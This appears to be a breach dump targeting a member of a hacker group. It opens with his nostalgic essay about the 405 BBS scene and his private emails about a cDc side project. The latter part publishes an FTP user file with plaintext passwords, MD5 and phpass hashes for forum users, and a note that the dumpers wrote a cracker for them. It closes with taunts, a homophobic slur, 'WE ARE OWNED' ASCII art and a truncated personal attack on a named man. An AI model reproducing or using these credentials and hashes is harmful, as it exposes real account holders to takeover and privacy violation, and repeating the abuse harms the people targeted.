hardware. Back in the early Commodore days, floppy dri= ves > > cost $200 each. You could run a BBS with just one drive, but all your > > system files on one disk didn't leave much room for games. Plus if you > > were running in this configuration, people could crash your board simpl= y > > by upload files until your disk filled up, preventing the BBS software > > from writing to disk and locking the whole thing up. To run a serious > > warez board you needed multiple floppy drives; running three (one for t= he > > BBS itself, one for uploads and one for downloads) wasn't unheard of. T= he > > really serious guys invested in hard drives. In the late 80's, a 10 meg > > hard drive for the C64 would set you back over a thousand dollars. > > > > As a result of all this separation, 405 (and as I mentioned earlier, al= l > > area codes) ended up with "pockets" of users. Imagine them as the kids = you > > started kindergarten with and worked your way through elementary school > > with them at your side. The same people tended to call the same boards, > > and pretty soon small scenes began to develop. But again, these were > > mostly divided up by platform (the Commodore scene, the Apple scene, et= c). > > In addition, each platform was likely to have multiple scenes, groups o= f > > people who never crossed paths. > > > > I had some great times within both the Apple and Commodore scenes =96 s= o > > much in fact that I've almost finished my first book on the subject =96= but > > none of these fractured cells can truly be called the "405 scene". In m= y > > opinion, that didn't happen until the early 90's. The main catalyst for > > this change was the unification of platforms. We all got IBM PCs =96 or > > rather, for many of us, our parents did. Businessmen across the country > > were buying PC's with hard drives and modems to keep up in the business > > world. At night, after those businessmen went to bed, their kids would > > turn those same machines back on and begin dialing BBSes. > > > > - > > > > As everyone began gravitating toward the IBM platform, all of our world= s > > began meshing together as well. As more people began calling the same > > boards and the pool of people began to grow, cool things began to happe= n =96 > > namely, "like people" began to find each other. As a result, some reall= y > > cool things began to happen. > > > > One was the birth of TBH405, or simply The Brotherhood. TBH405 was a gr= oup > > of people who actively promoted the local scene. TBH405 released > > scene-related newsletters, ranking local boards and users and keeping > > people informed as to the "goings-on" of the inner circle, so to speak. > > Think of it as the cool kids from school, if the cool kids from school = had > > had their own club. The coolest thing about The Brotherhood was its wid= e > > variety of members and their skills. Sure there were warez hounds, but > > there were people who were into hacking, and the art scene, and > > programmers, and all kinds of stuff. If you were a member of The > > Brotherhood, you were hooked up. > > > > TBH405 wasn't the only group in town. Soulz at Zero, often referred to = as > > the first themed lit group, was founded by The Stranger and myself in 4= 05. > > A group of five girls known as TDKEB also had some success with their l= it > > packs which consisted of poetry, stories, girly-gossip and in jokes. > > TBH405 even managed to get their public meeting times published in 2600 > > Magazine for a while. > > > > Like many other area codes, there was always a select few BBSes that ha= d > > risen above the local scene and made contact with the outside world. > > Boards like Scooter Dome and The Plutonium Project kept the rest of the > > 405 scene stocked with the latest games and applications. Even better w= as > > when Street Spydrs (the Razor 1911 WHQ) temporarily relocated to our ar= ea > > code. Suddenly the scene locals were being drafted into courier positio= ns > > for the megagroup, and local boards were flooded with all the latest > > warez. > > > > Of course my greatest memories of those times weren't about the groups = or > > the warez or even the boards themselves, but about the people. Since BB= S > > "scenes" normally consisted of people who lived within the same area co= de, > > it was not uncommon for those people to meet in real life. Sometimes it > > was for "business" reasons; back in the early days, due to slow modem > > speeds it was often quicker to trade software with someone in person th= an > > it was to do over the phone lines. There were just as many social event= s > > as well =96 BBS Parties, as they were referred to. A local Commodore 64 > > cracking group I was a member of (the OK Krackers) hosted the first BBS > > party I ever attended. It was also the first time I ever got drunk. I w= as > > 14. Imagine mom's surprise when she picked me up the next morning and > > found dried puke stuck in my hair and one shoe missing. It was a long > > night. > > > > Over the years I attended dozens of local parties. The Brotherhood had > > their own official "Gatherings". There were nine or ten of those, each > > wilder than the last. There was the one where Ozzymandias passed out, f= ell > > against a wall and knocked his front tooth out. There was the one where > > someone ate pink Hostess snacks and managed to vomit pink puke all over > > someone's living room carpet. There was the one where people were doing > > shots of Jack Daniels and Pace Picante Sauce. Then there was the Gather= ing > > where Yaun-Ti (the founder of TBH405) got so drunk that he forgot where= he > > lived, a fact he informed us of after several of us drove him around fo= r > > hours on end. > > > > The interpersonal relationships that formed during those times were > > unbreakable, or so we thought. I can remember joking with people that > > someday our kids might call the same BBSes we called. It seemed like th= e > > scene would never die =96 and then practically overnight, it did. > > > > In mid-to-late 1994, several of us discovered the Internet. At least fo= r > > us this was pre-Web days. The Internet for us consisted of a few FTP si= tes > > and IRC. IRC seemed mind blowing to us at the time. For years we'd been > > limited to chatting with one person at a time, and all of a sudden here > > you could have hundreds of people talking in the same place. > > > > What's funny though, looking back, is that everything we saw that you > > could do on the Internet we saw as an extension of the BBS world. The > > Internet was another place you could get warez for your BBS. Using the > > Internet, you could route mail to and from other boards. If your favori= te > > BBS was busy, you could get on the Internet and chat on IRC until the > > board became available. I don't think we ever realized just how quickly > > the Internet would squash out little local scene out of existence. But = it > > did. It killed them all eventually. Some hung on longer than others, bu= t > > eventually as speeds increased and the web blossomed it became evident = to > > even the oldest of the old schoolers that there was no stopping the > > behemoth. > > > > Soon, nobody cared what area code you were from because it didn't matte= r. > > In that sense the Internet was the great equalizer. Nobody knew your > > history and nobody cared about your little local groups. The Internet w= as > > global, baby. > > > > Just like the old neighborhood, I'm still wistful about those old days.= I > > try and keep touch with as many of the old group as possible. Anacodia > > married Tekin and moved to California. False God got on with Dell and > > lives in Austin. Gatoperro moved to Texas and is now in California, I > > think. Prong moved to Florida. My buddy Arcane lives outside of Dallas. > > There are a few of us still left in 405. Violetta Kitten moved out of > > state and came back. Leperkhan still lives here; his kid's in junior hi= gh > > now I think. The Stranger's an elementary schoolteacher somewhere aroun= d > > these parts. Black Sunshine's got 14 degrees or something in psychology > > and sociology and working on her doctorate. Rivas works for a major > > aeronautical company. I work for a different one. It gets harder and > > harder to keep track of people. Some you can still catch on IRC. Some h= ave > > blogs. Some I get an e-mail from a couple of times a year. Some > > disappeared completely. > > > > At least one died; Ghost in the Machine passed away several years ago. = It > > was a strange way to reunite the old gang one last time. In one small, > > dingy church sat most of the major players from the old 405 scene. Look= ing > > around the room I saw people I'd cracked password files with, people I'= d > > hacked ISP accounts with, people I'd gone to concerts with, people I'd > > drank too much and passed out with, all sitting around wearing ties, > > trying to look at least semi-respectable. That was the last time I saw > > most of the old crew; at a funeral, of all places. > > > > - > > > > This past weekend, my old neighborhood had their annual garage sale > > weekend. It's weird going back there a generation later, as so much stu= ff > > has changed. The old creek I used to play army in was paved long ago an= d > > surrounded by a chain-link fence shortly after. The field I used to pla= y > > football in has a house on it. Our old dirt bike track is now home to a= n > > official softball field. There are other parts of the neighborhood that > > still look the same. The willow tree under the streetlight across the > > street from my old house is still there. The view out my father's bay > > window looks the same as it did 20 years ago. > > > > The old BBS landscape, however, is gone forever. The disks have been > > thrown away, or were formatted, or simply rotted over time. In my garag= e I > > have 3-ring-binders full of old printed out user lists and text files, = the > > ink of which has faded over the years. I hang on to old spiral notebook= s > > filled with names, passwords and phone numbers, but the more time goes = by > > the less familiar the notes look. I recognize the handwriting as my own= , > > but the meaning behind some of the notes gets more cryptic each year. > > > > Even some of the stories have begun to fade from my human brain. "Remem= ber > > when we =85" someone's story will start, and I'll think to myself =85 "= no, I > > don't." Maybe it'll sound familiar, maybe it won't. With no written > > documentation, I find that many of the stories are different depending = on > > who's telling them. > > > > Rose-colored glasses or not, I'll always think back to the old BBS days= as > > some of the greatest times of my life. The files, the games, the disks, > > the accounts, even the boards themselves are all gone, but the memories= , > > the adventures, the fun times =85 they'll always be with me. > > > > Here's to ya, 405. > > > > --- EOF --- > > > > Rob > > > Return-Path: Received: from fed1rmimpi01.cox.net ([]) by fed1rmmtai19.cox.net (InterMail vM. 201-2131-123-102-20050715) with ESMTP id <20060126011449.UHUA3923.fed1rmmtai19.cox.net@fed1rmimpi01.cox.net> for ; Wed, 25 Jan 2006 20:14:49 -0500 Received: from web34208.mail.mud.yahoo.com ([]) by fed1rmimpi01.cox.net with IMP id pdCv1T02Q2g7tYq0000000 for flack@cox.net; Wed, 25 Jan 2006 20:12:57 -0500 Received: (qmail 33048 invoked by uid 60001); 26 Jan 2006 01:16:48 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Typ e:Content-Transfer-Encoding; b=qAO1mi3iiD32bvfYTqqpl77MhWaIYWnfHchGrEU0jVdm9LKKD3l/sARO/jr934RQ/1/sdu0Q0+w7f uLvzhNDf/3hXgXKPwKNrvTNzNPYNfjaEbV7UCjycW/CfcTfFckImFu5OrzJaYT47BBQlDE+qXLRL4fC KsCMh04iQvuLXFc= ; Message-ID: <20060126011648.33046.qmail@web34208.mail.mud.yahoo.com> Received: from [] by web34208.mail.mud.yahoo.com via HTTP; Wed, 25 Jan 2006 17:16:48 PST X-Priority: 3 X-MSMail-Priority: Normal Date: Wed, 25 Jan 2006 17:16:48 -0800 (PST) From: "Grandmaster Ratte'" Subject: Re: cdc-nsf site - beta online X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 To: In-Reply-To: <20060125192234.PWUM5868.centrmmtao05.cox.net@[]> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Looks really good - totally dig the graphics and colors and ninja themed stuff. Quick work, too! Sorry, I've had my head down this week buried in trading stuff - difficulties have arisen. Myles can do adminy stuff better & faster than I can if you need any of that. Me, I just got opinions (ha). Anyway, looking forward to the other guys taking a gander at it. I'm sure they'll be stoked. This a great example of what I'm the most happy to see with NSF stuff - someone sensing a need and just filling it w/out a whole lot of committee chatter and whatnot. Awesome. k3v --- flack@cox.net wrote: > Still working on some (a lot) of the graphics and features. Random pic > directory is now working. Setting up different bloggers is simple. > > After fighting with my isp I got them to add another db for free so I moved > all the hosting and db back to my site for now. > > http://www.robohara.com/nsf > > Any input, etc, always appreciated. Once I tweak for another day or two > I'll post it up in the cDc forum for input. > > Rob > > Return-Path: Received: from centrmimpi01.cox.net ([]) by centrmmtai07.cox.net (InterMail vM. 201-2131-130-101-20060113) with ESMTP id <20060803162151.GISZ22269.centrmmtai07.cox.net@centrmimpi01.cox.net> for ; Thu, 3 Aug 2006 12:21:51 -0400 Received: from wr-out-0506.google.com ([]) by centrmimpi01.cox.net with IMP id 5UGs1V00c56SlvC0000000 for flack@cox.net; Thu, 03 Aug 2006 12:16:54 -0400 Received: by wr-out-0506.google.com with SMTP id 71so468802wri for ; Thu, 03 Aug 2006 09:21:49 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:cont ent-type:content-transfer-encoding:content-disposition:references:x-google-send er-auth; b=RCl0I0rher+NauD+7ImP+cTHUMmcEUK4x0l3PnF+zcQCKZuSU9QQfYYohdTU3LBeoBGtCtiVZwbvt lqdLshSFkI6DcdFyk0cRrQgpK5jNSKI16pgQrs+VP4bRx1qZNixqg9OnVbh37y++6lx0QQvayZSLuvi wEQ8A0Jdd8Ot+9c= Received: by with SMTP id o19mr792475huc; Thu, 03 Aug 2006 09:21:49 -0700 (PDT) Received: by with HTTP; Thu, 3 Aug 2006 09:21:49 -0700 (PDT) Message-ID: <14d2d440608030921h75f0eb8dl5b198bcf55ab40e7@mail.gmail.com> X-Priority: 3 Date: Thu, 3 Aug 2006 11:21:49 -0500 X-MSMail-Priority: Normal From: "Myles Long" Sender: To: X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 Subject: Re: b0m In-Reply-To: <28117526.1154621696939.JavaMail.root@centrmwml01.mgt.cox.net> MIME-Version: 1.0 Content-Type: text/plain; format=flowed; charset="ISO-8859-1" Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <28117526.1154621696939.JavaMail.root@centrmwml01.mgt.cox.net> X-Google-Sender-Auth: e0185e07296fc22c > What's the best way to title my app for cDc? That's a really good question... > Right now in the title bar I have: "batch-0-matic 1.0 - (c) 2006 Flack/cDc-NSF" That looks good to me. Including "cDc" is key, and including NSF works, too; it'll help differentiate the NSF from the CULT, but make it clear that it's still part of the overall cDc (because cDc <> CULT, though that's the confusion). > Would it be preferrable to remove my name, drop the NSF, etc? Doesn't matter to me, > just looking for the standard (?). Also, speaking of standards, any preferred format for > documentation? In the past I've always done HTML but I could do plain txt or something > else (?). As far as I know, there aren't standards for this stuff, though there probably should be. Maybe not put the copyright info in the titlebar? Maybe in an about screen or on a splash screen? I dunno, either way is cool. We should establish some sort of uniformity to branding cDc-related apps; since I'm lazy, I'll just declare that whatever you do is the de facto standard. Heh. > A week or so ago Kevin sent out an e-mail requesting someone code a Google > Hacking/Query app. I plan on having a proof of concept done by the end of this weekend. That's something that Mixter was working on/was going to work on; I don't know the details about what all, if anything, he's done besides conceptualize. That's not to say that you shouldn't work on it; in fact, you definitely should. Proof of concept is a key point in moving this forward, and this could be huge if we play it right. I've found, as I think you and I have discussed before, that lots of cDc-related people are big on ideas and small on follow-through. So, yeah, go for it, then we can either fold it and Mixter's deal together or we can call for help on yours or whatever. Long story short, great idea, can't wait to see it. -steev Return-Path: Received: from fed1rmimpi01.cox.net ([]) by fed1rmmtai14.cox.net (InterMail vM. 201-2131-130-101-20060113) with ESMTP id <20060820232422.LCOU23661.fed1rmmtai14.cox.net@fed1rmimpi01.cox.net> for ; Sun, 20 Aug 2006 19:24:22 -0400 Received: from py-out-1112.google.com ([]) by fed1rmimpi01.cox.net with IMP id CPG71V02R3xkgLG0000000 Sun, 20 Aug 2006 19:16:09 -0400 Received: by py-out-1112.google.com with SMTP id z59so977048pyg for ; Sun, 20 Aug 2006 16:24:19 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:cont ent-type:content-transfer-encoding:content-disposition:references:x-google-send er-auth; b=BvalRNpgFWg2eblZB59X41B2lFC/iFIAZkgZovC/0kbLc7QADLAJfwvxn0XnuVfg4k46AXdoolOpi CsMULCCpcWItzY9RsCsfDdJf+Ie8F3TnEtRNnUXE6R826YQb+EnBUYflgVkehEtswXxDfh8wWVIm5TM Z2Ovdt+EBaAAe8g= Received: by with SMTP id i7mr6008834qbf; Sun, 20 Aug 2006 16:24:19 -0700 (PDT) Received: by with HTTP; Sun, 20 Aug 2006 16:24:19 -0700 (PDT) Message-ID: <14d2d440608201624m607309d3t4a81debf9824ece6@mail.gmail.com> X-Priority: 3 X-MSMail-Priority: Normal Date: Sun, 20 Aug 2006 18:24:19 -0500 From: "Myles Long" Sender: X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 To: Subject: Re: youtube In-Reply-To: <000801c6b770$d8516170$0401a8c0@Empire.com> MIME-Version: 1.0 Content-Type: text/plain; format=flowed; charset="ISO-8859-1" Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <11893955.1154640056011.JavaMail.root@centrmwml01.mgt.cox.net> <14d2d440608031744r77682ddcn76f237ecb185f2b0@mail.gmail.com> <000801c6b770$d8516170$0401a8c0@Empire.com> X-Google-Sender-Auth: 9b9f592bd215936c Sorry for the delayed reply, I'm really quite a slow ass. I hope my recent pimping of your book will help make up for my slowness. Check this out: http://www.cultdeadcow.com/archives/2006/08/commodork.php3 http://www.cultdeadcow.com/cms/fashion.php3 > Hey, you didn't bug me too much about the app -- I was just dragging my > feet. For a long time I lost the original source code, and then when I found > it I didn't have vb installed on my laptop any more. So it's been kind of a > back burner kind of thing. Cool, I just worry that I get overzealous about this stuff at times. The app is still gonna come out, you've got my word on that. Probably Tuesday or Wednesday; I try to limit my blog posting to one per day, and tomorrow's probably going to be the cDc book. There are some graphics and t-files and audio ready, too. I'll hit G.Ratte' up in a minute and try to get a firm date. > You know, to tell you the truth I kind of lost interest in the whole cDc > thing for a bit. We've talked about this before, but I just had this > misperception that there would be like, you know, weekly meetings and secret > handshakes or something, where we would all get together and work on Yeah, I know what you mean. I've gone through several periods of loss-of-interest in cDc stuff. I'm glad you're back, though. It's all about having people such as yourself that actually do stuff. As for secret handshakes, that we do have (really). Check this out: http://www.cultdeadcow.com/pics/2006_defcon_14/Gratte_mudge.JPG That's the first secret handshake; one person puts his/her arms around another person with the hands in the position that Mudge's hands are in, then the second person milks the thumbs as if they were udders. I guess it's not that secret, since there's a picture of it on the web, hah. There's a second secret handshake that I can't remember right now. > projects. I'm sure you remember my initial frustrations on the lack of > organization in the beginning. That's the main reason I kind of blew off my > plans to go to Defcon. But over the past few weeks, it's like people have Yeah, people come together around the cons and shit gets done. In between cons, though, not much happens. We try to keep things afloat with t-files and stuff, but the con-stuff is pretty much when it happens. That's not always true; Oxblood's got his stuff with the Dalai Lama and whatnot that keeps us in the news (especially lately), but for the most part, it's the silly hacker cons that are our "bread and butter," doing-stuff-wise (and media-wise). I guess it's because we sort of a have a captive audience at the cons; it's people who are definitely interested in our stuff, for the most part, and the media shows up, too. I'm not saying this is the way it should be, but this is the way that it has always been, in my experience. > started coming together. I think I see cDc as less of a cohesive group and > more of just a think tank of cool people. I think I was waiting for other > people to do cool stuff all this time and I finally see that it's not like > that, it's more about doing stuff on your own and getting help/support with Yeah, cDc is not really a cohesive group with real goals or anything like that. It's really just a brand in search of a product; the group (the name, really) is symbiotic with its various members. People do stuff, put cDc's name on it, get more notice than they were likely to have gotten if they'd self-released it. In turn, the brand is strengthened. It's a cool concept when there's stuff going on, otherwise it canbe frustrating. Definitely the think tank idea is something we're trying to promote, as well. > those projects. At least that's what I think right now, heh. The Flack man's > opinion is always subject to change, haha. Hah, yeah, that's the way it should be. Things are pretty good, cDc-wise, right now, but I'm not sure that I'll always think that's true. I get tired of being the only one posting on the main blog, for instance, especially given that there are 20ish others with posting access. Well, Krass Katt posts sometimes, but she's the exception lately...anyway, I ramble. Things are pretty good, but shit happens and people move in and out of the "cDc circle" or whatever and things can change. Hopefully things will stay good, but there are never any guarantees. We need to milk (hah) this recent media attention, which we've done a reasonable job of so far, but it needs to continue. G. Ratte' told me that the word on the street at HOPE was that a lot of the younger kids don't know who we are anymore; that was kind of shocking, but I believe it. Ever onward, though, gotta keep it poppin' fresh. Heh. > I am honored to have the cDc badge on batch-0-matic. It's pretty cool to > think that people might download it and use it in ways I never even thought > of. That would be awesome. Yeah, that'd be rad. That's the whole symbiotic brand-thing. We (the group, collectively) hype your project and in turn hype ourselves. I really am pushing for this to get released; sorry it's been a bit of a delay on my part. The whole Defcon thing happened, then there was the stuff about Tibet and whatnot, and then I've been actually busy at work for the past week (work is where I usually do cDc stuff), but I'm pushing to get it out ASAP. > Cool deal on the cDc book. I kind of got pushed into a time crunch and had > to order 30 copies right off the bat before ordering one print copy in > advance. I know it's a gamble but I plan on debuting it August 19th at OVGE > (a local videogame exhibition) and I don't have time for two rounds of > printing/shipping before then. After the debut I'll start pushing it online > and stuff. I read a quip that said the average self-published book sells > about 200 copies. I don't want to get my hopes up, but that seems pretty > low. Yeah, 200 seems low. Still, 200 copies is decent. I'm thinking that, if I sell enough copies of the cDc book to pay for it, I'll buy some to consign in local bookstores. Also, maybe do the amazon-listing-thing (apparently, you have to manage your own inventory to do that, at least, if I'm understanding it correctly). I'd also like to get copies into the local libraries, not sure how to go about doing that. It'd be kind of fun(ny), though. Thanks for the insight into lulu; I'm pretty happy with the one copy I got (though there were errors in it -- my fault, not theirs -- that have since been corrected...I guess that's the point of a "preview copy"...and hey, now my copy is a collectors' item, since it's got errors. Hah). > I haven't figured out a good way around their royalty rates for people > either, unless like you said I order a bunch of copies and then ship them > out to people. Still, that'd be cheaper for them to pay for the book and > priority shipping. I dunno. I guess this is where a marketing plan would > have come in handy. I also need to get a crash course in PR writing and > submit something about the book to some online PR sites as well as a few > newspapers. Did DaYuM help you with the PR stuff? I saw that you'd asked her to on the forum, but I can't recall if she replied. Good idea on selling the stuff royalty-free to friends and such (eliminating the royalty before the public release); I've sold 15 copies to cDc people, not bad. I'd have expected a few more, but money's tight for a lot of people, definitely understandable. > I don't know how much you messed with b0m, but the drop down menu pulls text > from standalone .txt files and imports them into the program. I think that's > what Mixter/Ratte were talking about wanting that Google app to be able to > do. We could offer packs of .txt files with the latest "h0t hack3r qu3ries" > that people could download and unzip (and of course write and share their > own). I already have the drop-down code and the web query code from b0m, all > I have to do is get them working in a new stand alone app. I'm thinking > it'll be ugly, but working by cob tomorrow. I like your google app concept; Mixter seemed to dig it, too, though you're right that it's geared toward a single platform. Still, it's good work that could/should be used somehow, I think. Take care, man. How'd the book release at OVGE go? Sorry again for the lateness of the reply. -steev ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ FTPD deets: [Flack] Login=Flack Pass=patrick EnableGroup=1 GroupName=God Home-Ip= RelativePath=1 TimeOut=600 MaxConPerIp=1 MaxUsers=0 RatioMethod=0 RatioUp=1 RatioDown=1 RatioCredit=0 MaxSpeedRcv=512 MaxSpeedSnd=512 QuotaCurrent=0 QuotaMax=0 DefaultGroupRatioCredit=0 DefaultGroupQuotaCredit=0 UseGroupHomeDir=1 Stat_Login=473 Stat_LastLogin=3/28/2008 2:51:37 PM Stat_LastIP= Stat_KBUp=321389827 Stat_KBDown=9362540921 Stat_FilesUp=624 Stat_FilesDown=3256 Stat_FailedUp=0 Stat_FailedDown=48 [Justin] Login=Flack2 Pass=patrick EnableGroup=1 GroupName=General Home-Ip=-= All IP Homes =- RelativePath=1 TimeOut=600 MaxConPerIp=1 MaxUsers=0 RatioMethod=0 RatioUp=1 RatioDown=1 RatioCredit=0 MaxSpeedRcv=512 MaxSpeedSnd=512 QuotaCurrent=0 QuotaMax=0 DefaultGroupRatioCredit=0 DefaultGroupQuotaCredit=0 UseGroupHomeDir=1 Stat_Login=20 Stat_LastLogin=11/9/2007 1:57:58 PM Stat_LastIP= Stat_KBUp=63636702 Stat_KBDown=486982 Stat_FilesUp=4 Stat_FilesDown=2 Stat_FailedUp=0 Stat_FailedDown=0 [TStranger] Login=TStranger Pass=Nikki EnableGroup=1 GroupName=General Home-Ip=-= All IP Homes =- RelativePath=1 TimeOut=600 MaxConPerIp=1 MaxUsers=0 RatioMethod=0 RatioUp=1 RatioDown=1 RatioCredit=0 MaxSpeedRcv=512 MaxSpeedSnd=512 QuotaCurrent=0 QuotaMax=0 DefaultGroupRatioCredit=0 DefaultGroupQuotaCredit=0 UseGroupHomeDir=1 Stat_Login=85 Stat_LastLogin=7/13/2007 8:25:42 PM Stat_LastIP= Stat_KBUp=144077241 Stat_KBDown=477431220 Stat_FilesUp=27 Stat_FilesDown=47 Stat_FailedUp=0 Stat_FailedDown=11 [hardwire] Login=hardwire Pass=nether437 EnableGroup=1 GroupName=General Home-Ip=-= All IP Homes =- RelativePath=1 TimeOut=600 MaxConPerIp=1 MaxUsers=0 RatioMethod=0 RatioUp=1 RatioDown=1 RatioCredit=0 MaxSpeedRcv=512 MaxSpeedSnd=512 QuotaCurrent=0 QuotaMax=0 DefaultGroupRatioCredit=0 DefaultGroupQuotaCredit=0 UseGroupHomeDir=1 Stat_Login=4 Stat_LastLogin=11/24/2006 2:30:13 PM Stat_LastIP= Stat_KBUp=0 Stat_KBDown=163 Stat_FilesUp=0 Stat_FilesDown=2 Stat_FailedUp=0 Stat_FailedDown=0 [gratte] Login=gratte Pass=dump2389 EnableGroup=1 GroupName=General Home-Ip=-= All IP Homes =- RelativePath=1 TimeOut=600 MaxConPerIp=1 MaxUsers=0 RatioMethod=0 RatioUp=1 RatioDown=1 RatioCredit=0 MaxSpeedRcv=512 MaxSpeedSnd=512 QuotaCurrent=0 QuotaMax=0 DefaultGroupRatioCredit=0 DefaultGroupQuotaCredit=0 UseGroupHomeDir=1 Stat_Login=2 Stat_LastLogin=11/30/2006 9:43:25 AM Stat_LastIP= Stat_KBUp=0 Stat_KBDown=0 Stat_FilesUp=0 Stat_FilesDown=0 Stat_FailedUp=0 Stat_FailedDown=0 [k8track] Login=k8track Pass=m00n EnableGroup=1 GroupName=General Home-Ip=-= All IP Homes =- RelativePath=1 TimeOut=600 MaxConPerIp=1 MaxUsers=0 RatioMethod=0 RatioUp=1 RatioDown=1 RatioCredit=0 MaxSpeedRcv=512 MaxSpeedSnd=512 QuotaCurrent=0 QuotaMax=0 DefaultGroupRatioCredit=0 DefaultGroupQuotaCredit=0 UseGroupHomeDir=1 Stat_Login=47 Stat_LastLogin=1/7/2007 4:52:24 PM Stat_LastIP= Stat_KBUp=80716217 Stat_KBDown=5800395 Stat_FilesUp=17 Stat_FilesDown=4 Stat_FailedUp=0 Stat_FailedDown=0 [Jeff] Login=Jeff Pass=Martin EnableGroup=1 GroupName=General Home-Ip=-= All IP Homes =- RelativePath=1 TimeOut=600 MaxConPerIp=1 MaxUsers=0 RatioMethod=0 RatioUp=1 RatioDown=1 RatioCredit=0 MaxSpeedRcv=512 MaxSpeedSnd=512 QuotaCurrent=0 QuotaMax=0 DefaultGroupRatioCredit=0 DefaultGroupQuotaCredit=0 UseGroupHomeDir=1 Stat_Login=95 Stat_LastLogin=3/19/2008 12:55:57 PM Stat_LastIP= Stat_KBUp=80716217 Stat_KBDown=5565827658 Stat_FilesUp=17 Stat_FilesDown=515 Stat_FailedUp=0 Stat_FailedDown=3 ~~~~~~~~~~~~~~~~~~~~~~~~~ NSF raw MD5 hashes: Devolish:fbe1f0501c204002b9d7142488265e5f MiB:d1a7217ac0e3ca2f6091c2c8b1402cca phrenchtoast:8bd2e98ec745609d79f88fbcdc0c7f23 Trammel:87c4456c84817d9ddbbca21197a0bf88 Punkle Jones:536acd279c5c4026cbf879cb49219698 screv:1c80b2601f88693548ccd6283b2fca99 lowlux:1c9f88e9d5186a76b666ed76c6b091c7 Omnininja:9651e75fcf0230ec8efd44a8d054c306 nihilism:5297b609864f97c7386aa4adf47e7e40 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9to5clone:cdcc521680f788ce572c72e65e7bcd27 tolopoj:24480ce8ccedc7e3ba586ccfdaefe084 painvancy:1035f6695f84535aee2070a0e17e13f2 Smooth69er:68ea62a73d73d63eee9715eeb9d8d7c2 Riot:683237f9a5992d9cca6b1e2d954fbdf7 RI0T:ac48e80fc98070d86c33155f761ecb0a MasterNinja666@:5267df8d50fd823c5a80a8aefa8f97d8 Neko-Kun:040b77a8be248f3b05c312c553daa742 DarkendHeart:f34039d579a8c25d26a80b15b637daed palmada:4daba13a8054ad584972d5df21f31d58 spuddups:09be3184d7aaa0f5ea2e7b24affdf542 Doomassassin:6af249e7f8dd8a39ae4640a647d7b64b hardboiled:ec856259c48e18e89109f8264d4b946d j4va:034894f3fd6602316b506fcfd61921dc Cainr:88c1bc7be8968cbdfbaf41dc950b6264 dave:cc32071d725b0de69564ee5ebf3d3d35 cyrus104:26a5dfb4c49d6556fe32cab7a3a2e216 GectGeodo72:b1fa2d0ec149847814626d2cc518fbeb schwartzkopf07:bb03e0cfa71a6f9ea17eecd2b6a62eb4 adultdatingplus:d616afab0a7f34b9b75cf793d353f955 acokanthera:c175ce66cde24c20ebc6dec62853f452 gillam:a229c0f1f33fe258b891ca183bbebfb9 Clone:6367efe45fca0bf499a51fb86a04a441 attaipurb:80d678421858bfaded59bf9fe20a8c33 Jeremy97:fa3c45dbc7d48e24dfb7b2ecbbb1e0b4 p3zz:26242e1fa59b4fe7e5e50af6909f1e1b szubi122:7d29c2495278e9609ebe464d91c9de88 sizeaspem:5d107535225ba6d2e61a65287dd7e67f Parkerw207:6f8b1bb39501aac8eee0516e4299f13c parkerw2077:7873289b36590a14baafedf92117a3e7 NSF phpass hashes (we wrote a cracker for this but obviously it's slow as shit): admin:$P$BviUeSfCipChNKr7A3lLwusSk0qS1W/ Myles Long:$P$BQ0J3AF/sPHtcCh21dX2YA.ITGz56V/ Elliot Pank:$P$BS6Bwo5Bb9WmmOJDctq/2jp8k5upxt/ Masterslip:$P$BkVhLpHxfzJBsyHLqzTj2upPVLrGuJ/ ekimike:$P$Bp8YYf84i1yuQ7ldPlRSR6IOayR7Np. charlesbabbage:$P$ByNdwncZJ.bDxHucOmzxtvcp8mbzxu/ sM10:$P$BiOfLKVtrY5MR/Mz9eO1HXPbPITgGU/ z3r0_co01:$P$BuoWQTR6UFIsDvSq6.x9xrD6D8SA.Q/ darkmalice:$P$BjFDOWz/0/XlsB4UZtfbPAnYdxnPLF0 force-unleashed:$P$BK4ZUuY4UoLTzc4EuVk6I1ru4rrDrv/ herrek:$P$Byj25/1sdfQmEvQvR1oj/Zav8KY1Ek/ z3r0co01:$P$BE9KHP01pJm7IHpsCO25qNyy7lI13J1 photoabc:$P$BHfcImk4n0Vc9RRAxYKoo2Lu8NgXXP1 muditjames:$P$B8oGioLzv4B607UJnw1IqbKCR0PzNE. kingpin:$P$BCU39G5KbzWjYlanPbkTsslZj3lHXT0 testing:$P$BSoUGyz11rBx9i6kBiBo9Owj22F5Ul1 krasallcom:$P$B49UMPw1LWTn67bu9n1L40o.2amWli1 admin11:$P$BN1RKC0sVcFdBQ5T3z.a6q/g6MGMrI/ krvrlinek:$P$BdXhGoU077uhPTbtw.xYwxBaZcULAg1 Flack, why do you insist on aligning yourself with these faggots, playing the hacker game, and also storing your home videos on your host? We could have quite easily released them. We know you ain't no hacker. Do us and yourself a favour and get out of this circlejerk. Superheroes > Ninjas. WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED .-. _ _ .-. / \ .-. ((___)) .-. / \ /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \ -/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\- /THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\ \ / `-' (U) `-' \ / `-' `-' WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED Oxblood Ruffin. Legendary hacker, leader to thousands, the mind behind the hardcore political movement HACKTIVISMO, the man so many young kids aspire to be. Or not. Laird Brown, as he is better known to his friends (reporters), is a shmuck. He is nothing but a gobshite. Running his mouth around the internet bigging up cDc, his lame hacktivismo and let's not forget his blogs. You see, 